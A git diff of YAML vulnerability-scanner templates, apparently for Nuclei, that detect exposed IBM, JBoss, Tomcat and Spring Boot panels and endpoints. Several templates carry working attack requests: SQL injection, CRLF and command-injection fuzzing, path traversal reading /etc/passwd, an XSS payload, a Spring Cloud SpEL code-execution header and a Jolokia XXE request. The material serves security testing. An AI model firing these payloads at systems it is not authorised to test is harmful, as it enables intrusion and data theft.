a178a6d3b7..459d839dcb 100644 --- a/poc/ibm/ibm-note-login-8110.yaml +++ b/poc/ibm/ibm-note-login-8110.yaml @@ -1,18 +1,15 @@ id: ibm-note-login - info: name: IBM iNotes Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7122 - tags: panel - + tags: panel,ibm requests: - method: GET path: - '{{BaseURL}}' - '{{BaseURL}}/names.nsf' - matchers-condition: and matchers: - type: word diff --git a/poc/ibm/ibm-service-assistant.yaml b/poc/ibm/ibm-service-assistant.yaml index 1bb221af74..08e5b2ba96 100644 --- a/poc/ibm/ibm-service-assistant.yaml +++ b/poc/ibm/ibm-service-assistant.yaml @@ -1,20 +1,24 @@ id: ibm-service-assistant + info: name: IBM Service Assistant author: dhiyaneshDK severity: info - tags: panel,ibm,service metadata: - shodan-query: 'http.title:"Welcome to Service Assistant"' + shodan-query: http.title:"Welcome to Service Assistant" + tags: panel,ibm,service + requests: - method: GET path: - '{{BaseURL}}/service/' + matchers-condition: and matchers: - type: word words: - 'Welcome to Service Assistant' + - type: status status: - 200 diff --git a/poc/injection/GLPI-9.3.3-SQL-Injection.yaml b/poc/injection/GLPI-9.3.3-SQL-Injection.yaml index e7c97f72d9..98a2a439f1 100644 --- a/poc/injection/GLPI-9.3.3-SQL-Injection.yaml +++ b/poc/injection/GLPI-9.3.3-SQL-Injection.yaml @@ -1,30 +1,25 @@ ---- -id: GLPI_SQL_Injection - -info: - author: RedTeamBrasil - description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." - name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" - reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" - severity: high - tags: "glpi,cve,sqli" - -requests: - - - matchers: - - - part: body - type: word - words: - - "-MariaDB-" - max-redirects: 3 - method: GET - path: - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - redirects: true - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" \ No newline at end of file +id: GLPI_SQL_Injection +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." + name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" +requests: + - matchers: + - part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/poc/injection/buffalo-config-injection.yaml b/poc/injection/buffalo-config-injection.yaml index ffb62416e7..d02f4693f2 100644 --- a/poc/injection/buffalo-config-injection.yaml +++ b/poc/injection/buffalo-config-injection.yaml @@ -4,11 +4,14 @@ info: author: gy741 severity: critical description: | - The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. + Buffalo WSR-2533DHPL2 firmware version <=1.02 and WSR-2533DHP3 firmware version <=1.24 do not properly sanitize user input via their web interfaces. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. reference: - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 + classification: + cve-id: CVE-2021-20090 tags: buffalo,firmware,iot requests: - raw: @@ -28,3 +31,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/06/01 diff --git a/poc/injection/crlf-injection-1262.yaml b/poc/injection/crlf-injection-1262.yaml index 54d0057103..2fe6563ca0 100644 --- a/poc/injection/crlf-injection-1262.yaml +++ b/poc/injection/crlf-injection-1262.yaml @@ -2,19 +2,24 @@ id: crlf-injection info: name: CRLF injection - author: melbadry9 & nadino + author: melbadry9,nadino,xElkomy severity: low + description: Improper sanitization of CRLF sequences. + tags: crlf,generic requests: - method: GET path: - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection" - - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass + - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection" - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection" - - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache - - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975 + - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache + - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" + - "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection" + + stop-at-first-match: true matchers: - type: regex regex: diff --git a/poc/injection/header-command-injection-7917.yaml b/poc/injection/header-command-injection-7917.yaml index e9b07459aa..9cb3402bac 100644 --- a/poc/injection/header-command-injection-7917.yaml +++ b/poc/injection/header-command-injection-7917.yaml @@ -6,18 +6,17 @@ info: description: Fuzzing headers for command injection tags: fuzz,rce requests: - - payloads: - header: helpers/payloads/request-headers.txt - payload: helpers/payloads/command-injection.txt - raw: + - raw: - | - GET /?§header§ HTTP/1.1 + GET /?{{header}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - §header§: §payload§ - Connection: close + {{header}}: {{payload}} + payloads: + header: helpers/payloads/request-headers.txt + payload: helpers/payloads/command-injection.txt attack: clusterbomb redirects: true + stop-at-first-match: true matchers-condition: or matchers: - type: word @@ -28,4 +27,4 @@ requests: condition: and - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/poc/injection/viewlinc-crlf-injection-11015.yaml b/poc/injection/viewlinc-crlf-injection-11015.yaml index 97e0d4e5db..199d945cd7 100644 --- a/poc/injection/viewlinc-crlf-injection-11015.yaml +++ b/poc/injection/viewlinc-crlf-injection-11015.yaml @@ -1,16 +1,18 @@ id: viewlinc-crlf-injection + info: - name: viewLinc 5.1.2.367 - Carriage Return Line Feed Attack + name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. author: geeknik severity: low - description: viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned. - reference: - - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system + description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned. + reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system tags: crlf,viewlinc + requests: - method: GET path: - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" + matchers-condition: or matchers: - type: word @@ -19,11 +21,10 @@ requests: - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and + - type: word words: - "Server: viewLinc/5.1.1.50" - "Set-Cookie: crlfinjection=crlfinjection" part: header condition: and - -# Enhanced by mp on 2022/08/04 diff --git a/poc/injection/weiphp-sql-injection.yaml b/poc/injection/weiphp-sql-injection.yaml index 8b0c9a5a1a..2b57dda7f7 100644 --- a/poc/injection/weiphp-sql-injection.yaml +++ b/poc/injection/weiphp-sql-injection.yaml @@ -1,24 +1,28 @@ id: weiphp-sql-injection + info: name: WeiPHP 5.0 SQLI author: pikpikcu severity: high - reference: - - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - metadata: - verified: true - shodan-query: http.html:"WeiPHP5.0" + reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md tags: weiphp,sql + requests: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word - part: body words: - "52c69e3a57331081823331c4e69d3f2" + part: body + condition: and + - type: status status: - 500 diff --git a/poc/java/ecology-springframework-directoryTraversal.yaml b/poc/java/ecology-springframework-directoryTraversal.yaml old mode 100755 new mode 100644 diff --git a/poc/java/exposed-alps-spring-7284.yaml b/poc/java/exposed-alps-spring-7284.yaml index abbac6f138..5391725778 100644 --- a/poc/java/exposed-alps-spring-7284.yaml +++ b/poc/java/exposed-alps-spring-7284.yaml @@ -1,23 +1,16 @@ id: exposed-alps-spring - info: name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS) author: dwisiswant0 severity: medium - description: Exposed Spring Data profile semantics is exposed. - reference: - - https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ - metadata: - max-request: 3 - tags: exposure,spring,files - -http: + tags: exposure + reference: https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ +requests: - method: GET path: - "{{BaseURL}}/profile" - "{{BaseURL}}/api/profile" - "{{BaseURL}}/alps/profile" - matchers-condition: and matchers: - type: word @@ -27,13 +20,10 @@ http: - "profile" condition: and part: body - - type: word words: - "application/hal+json" part: header - - type: status status: - 200 -# digest: 490a0046304402200703b103b73e6c9bfffc56b77551a83932ef1f4e983b9075e82b4a2128ffff800220240eb935da994b34aa984e070bd64175bee530216e73e19f9af3add0ee595d5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/java/java-melody-xss-8225.yaml b/poc/java/java-melody-xss-8225.yaml index 53c48c29ef..3899625c59 100644 --- a/poc/java/java-melody-xss-8225.yaml +++ b/poc/java/java-melody-xss-8225.yaml @@ -1,6 +1,7 @@ id: java-melody-xss + info: - name: JavaMelody Monitoring - Cross-Site Scripting + name: JavaMelody Monitoring XSS author: kailashbohara severity: medium description: Reflected cross site scripting (XSS) in JavaMelody monitoring. @@ -8,19 +9,23 @@ info: - https://github.com/Hurdano/JavaMelody-XSS - https://github.com/javamelody/javamelody/pull/555 tags: xss,javamelody + requests: - method: GET path: - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - '' + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/poc/java/jboss-detect.yaml b/poc/java/jboss-detect.yaml index 5cfb12fe1d..d70d98fc0e 100644 --- a/poc/java/jboss-detect.yaml +++ b/poc/java/jboss-detect.yaml @@ -1,30 +1,22 @@ id: jboss-detect - info: name: JBoss detected - author: daffainfo,idealphase + author: daffainfo severity: info tags: tech,jboss - requests: - method: GET path: - "{{BaseURL}}" - + matchers-condition: and matchers: - type: word part: body words: + - "Welcome to JBoss AS" + - "Welcome to JBoss Application Server" - "JBoss EAP 7" - - - type: regex - part: body - regex: - - '<title>Welcome to JBoss(.*)' - - extractors: - - type: regex - group: 1 - part: body - regex: - - '

Welcome to (.+)<\/h1>' + condition: or + - type: status + status: + - 200 diff --git a/poc/java/jboss-status-8241.yaml b/poc/java/jboss-status-8241.yaml old mode 100644 new mode 100755 index 704f14789a..8333db7f7b --- a/poc/java/jboss-status-8241.yaml +++ b/poc/java/jboss-status-8241.yaml @@ -1,38 +1,30 @@ id: jboss-web-console - info: - name: JBoss Management Console Server Information Page - Detect - author: dhiyaneshDK - severity: info - description: JBoss Management Console server information page was detected. - reference: - - https://www.exploit-db.com/ghdb/5215 - - https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/6.4/html/administration_and_configuration_guide/sect-the_management_console - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - metadata: - max-request: 1 - verified: true - google-query: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true - tags: jboss,unauth,edb - -http: - - method: GET - path: - - "{{BaseURL}}/web-console/ServerInfo.jsp" - - matchers-condition: and - matchers: - - type: word - words: - - "Application Server" - - "Management Console" - condition: and - - - type: status - status: - - 200 - -# Enhanced by cs on 2023/03/10 + name: JBoss Management Console Server Information + author: + - l0ne1y + description: |- + JBoss管理控制台服务器信息泄露漏洞 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://jbossweb.jboss.org/ + 临时修复方案: + 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 + 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + condition: and + words: + - Application Server + - Management Console + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/web-console/ServerInfo.jsp' + method: GET diff --git a/poc/java/jinfornet-jreport-lfi-8309.yaml b/poc/java/jinfornet-jreport-lfi-8309.yaml index 0dedb521b3..c25375a9bb 100644 --- a/poc/java/jinfornet-jreport-lfi-8309.yaml +++ b/poc/java/jinfornet-jreport-lfi-8309.yaml @@ -1,24 +1,19 @@ id: jinfornet-jreport-lfi - info: name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal author: 0x_Akoko severity: high reference: https://cxsecurity.com/issue/WLB-2020030151 tags: jreport,jinfornet,lfi - requests: - method: GET path: - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/java/public-tomcat-manager-9709.yaml b/poc/java/public-tomcat-manager-9709.yaml index 7accd357e0..98a6145c02 100644 --- a/poc/java/public-tomcat-manager-9709.yaml +++ b/poc/java/public-tomcat-manager-9709.yaml @@ -1,16 +1,10 @@ id: public-tomcat-manager info: - name: Apache Tomcat Manager Disclosure + name: tomcat manager disclosure author: Ahmed Sherif,geeknik severity: info - description: An Apache Tomcat Manager panel was discovered. tags: panel,tomcat,apache - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 requests: - method: GET @@ -29,5 +23,3 @@ requests: - 401 - 200 condition: or - -# Enhanced by mp on 2022/03/16 diff --git a/poc/java/shiro-detect.yaml b/poc/java/shiro-detect.yaml index b918ac9d43..d1b92dd808 100644 --- a/poc/java/shiro-detect.yaml +++ b/poc/java/shiro-detect.yaml @@ -3,14 +3,17 @@ info: name: Detect Shiro Framework author: AresX severity: info + tags: tech,shiro requests: - method: GET path: - '{{BaseURL}}' headers: - Cookie: rememberMe=123; + Cookie: JSESSIONID={{randstr}};rememberMe=123; + redirects: true + max-redirects: 2 matchers: - type: word - words: - - rememberMe=deleteMe part: header + words: + - "rememberMe=deleteMe" diff --git a/poc/java/springForShell-CVE-2022-22963.yaml b/poc/java/springForShell-CVE-2022-22963.yaml index f28360d6a7..0df514805b 100644 --- a/poc/java/springForShell-CVE-2022-22963.yaml +++ b/poc/java/springForShell-CVE-2022-22963.yaml @@ -1,44 +1,49 @@ id: CVE-2022-22963 info: - name: CVE-2022-22963 - Spring Cloud RCE - author: rdnt + name: Spring Cloud - Remote Code Execution + author: Mr-xn,Adam Crosser severity: critical - description: RCE on Spring cloud function SPEL - tags: cve,rce,spring,cve2022,injection + description: | + Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + reference: + - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f + - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE + - https://tanzu.vmware.com/security/cve-2022-22963 + - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ + - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection + - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-770 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94 + epss-score: 0.97501 + tags: vulhub,cve,cve2022,springcloud,rce,kev + metadata: + max-request: 1 -requests: - - method: POST - path: - - "{{RootURL}}/functionRouter" - - "{{RootURL}}/api/functionRouter" - - "{{RootURL}}/api/v1/functionRouter" - - "{{RootURL}}/../../../../../../functionRouter" - - "{{RootURL}}/../../../../../../;functionRouter" - - "{{RootURL}}/spring/functionRouter" - - "{{RootURL}}/admin/functionRouter" - - "{{RootURL}}/../../../../../../../../functionRouter" - - "{{RootURL}}../../../../../../../../api/functionRouter" - - "{{RootURL}}../../../../../../../../api/v1/functionRouter" - - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" - - "{{RootURL}}%2fspring%2ffunctionRouter" - - "{{RootURL}}%2fadmin%2functionRouter" - headers: - spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") - Content-Type: application/x-www-form-urlencoded - body: exp +http: + - raw: + - | + POST /functionRouter HTTP/1.1 + Host: {{Hostname}} + spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") + Content-Type: application/x-www-form-urlencoded + + {{rand_base(8)}} matchers-condition: and matchers: - - type: word - part: body - words: - - 'functionRouter' - - type: status - status: - - 500 \ No newline at end of file + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/java/springboot-actuators-jolokia-xxe.yaml b/poc/java/springboot-actuators-jolokia-xxe.yaml index 31723c324d..8d86dd794f 100644 --- a/poc/java/springboot-actuators-jolokia-xxe.yaml +++ b/poc/java/springboot-actuators-jolokia-xxe.yaml @@ -2,27 +2,30 @@ id: springboot-actuators-jolokia-xxe info: name: Spring Boot Actuators (Jolokia) XXE - author: dwisiswant0 + author: dwisiswant0,ipanda severity: high + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + - https://github.com/mpgn/Spring-Boot-Actuator-Exploit + tags: springboot,jolokia,xxe requests: - method: GET path: - - "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word + part: body words: - "http:\\/\\/nonexistent:31337\\/logback.xml" - "reloadByURL" - "JoranException" - condition: and - part: body - - type: word - words: - - "X-Application-Context" - part: header \ No newline at end of file + condition: and \ No newline at end of file diff --git a/poc/java/springboot-dump.yaml b/poc/java/springboot-dump.yaml index 6002fe9b4a..0e9e254e73 100644 --- a/poc/java/springboot-dump.yaml +++ b/poc/java/springboot-dump.yaml @@ -10,6 +10,7 @@ requests: path: - "{{BaseURL}}/dump" - "{{BaseURL}}/actuator/dump" + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/poc/java/springboot-heapdump-10463.yaml b/poc/java/springboot-heapdump-10463.yaml index c84da82205..891314043a 100644 --- a/poc/java/springboot-heapdump-10463.yaml +++ b/poc/java/springboot-heapdump-10463.yaml @@ -1,11 +1,9 @@ id: springboot-heapdump info: - name: Spring Boot Actuator - Heap Dump Detection + name: Detect Springboot Heapdump Actuator author: that_juan_,dwisiswant0,wdahlenb severity: critical - description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. - reference: - - https://github.com/pyn3rd/Spring-Boot-Vulnerability + description: Environment variables and HTTP requests can be found in the HPROF tags: springboot,exposure requests: - method: GET @@ -25,5 +23,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/20 diff --git a/poc/java/springboot-info.yaml b/poc/java/springboot-info.yaml index e34a0d7d2f..899a74d592 100644 --- a/poc/java/springboot-info.yaml +++ b/poc/java/springboot-info.yaml @@ -10,6 +10,7 @@ requests: path: - "{{BaseURL}}/info" - "{{BaseURL}}/actuator/info" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -18,14 +19,14 @@ requests: - '"build"' - '"artifact"' condition: and - - type: status - status: - - 200 - type: word + part: header words: - "application/json" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v2+json" - "application/vnd.spring-boot.actuator.v1+json" condition: or - part: header + - type: status + status: + - 200 diff --git a/poc/java/springboot-log4j-rce.yaml b/poc/java/springboot-log4j-rce.yaml index 28f847f7e4..4286931f8d 100644 --- a/poc/java/springboot-log4j-rce.yaml +++ b/poc/java/springboot-log4j-rce.yaml @@ -1,10 +1,9 @@ id: springboot-log4j-rce info: - name: Spring Boot - Remote Code Execution (Apache Log4j) + name: Spring Boot Log4j Remote Code Injection author: pdteam severity: critical - description: Spring Boot is susceptible to remote code execution via Apache Log4j. reference: - https://logging.apache.org/log4j/2.x/security.html - https://www.lunasec.io/docs/blog/log4j-zero-day/ @@ -45,6 +44,4 @@ requests: part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - -# Enhanced by mp on 2022/05/31 + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/poc/java/springboot-loggers-10475.yaml b/poc/java/springboot-loggers-10475.yaml index b5e9d66968..4612e17e0c 100644 --- a/poc/java/springboot-loggers-10475.yaml +++ b/poc/java/springboot-loggers-10475.yaml @@ -1,14 +1,20 @@ id: springboot-loggers + info: name: Detect Springboot Loggers author: that_juan_,dwisiswant0,wdahlenb severity: low tags: springboot,exposure -requests: + metadata: + max-request: 2 + +http: - method: GET path: - "{{BaseURL}}/loggers" - "{{BaseURL}}/actuator/loggers" + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -17,13 +23,15 @@ requests: - '"loggers"' - '"levels"' condition: and - - type: status - status: - - 200 + - type: word + part: header words: - "application/json" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" condition: or - part: header + + - type: status + status: + - 200 diff --git a/poc/java/springboot-mappings.yaml b/poc/java/springboot-mappings.yaml index d9abf6d280..47604c0cef 100644 --- a/poc/java/springboot-mappings.yaml +++ b/poc/java/springboot-mappings.yaml @@ -1,10 +1,10 @@ id: springboot-mappings info: name: Detect Springboot Mappings Actuator - author: that_juan_,dwisiswant0,wdahlenb + author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: Additional routes may be displayed - tags: springboot,exposure + tags: springboot,disclosure requests: - method: GET path: diff --git a/poc/java/springboot-threaddump-10484.yaml b/poc/java/springboot-threaddump-10484.yaml index edf5e05d68..1e9c7022de 100644 --- a/poc/java/springboot-threaddump-10484.yaml +++ b/poc/java/springboot-threaddump-10484.yaml @@ -1,5 +1,4 @@ id: springboot-threaddump - info: name: Detect Springboot Thread Dump page author: philippedelteil @@ -8,15 +7,11 @@ info: reference: - https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump tags: springboot - metadata: - max-request: 2 - -http: +requests: - method: GET path: - "{{BaseURL}}/threaddump" - "{{BaseURL}}/actuator/threaddump" - stop-at-first-match: true 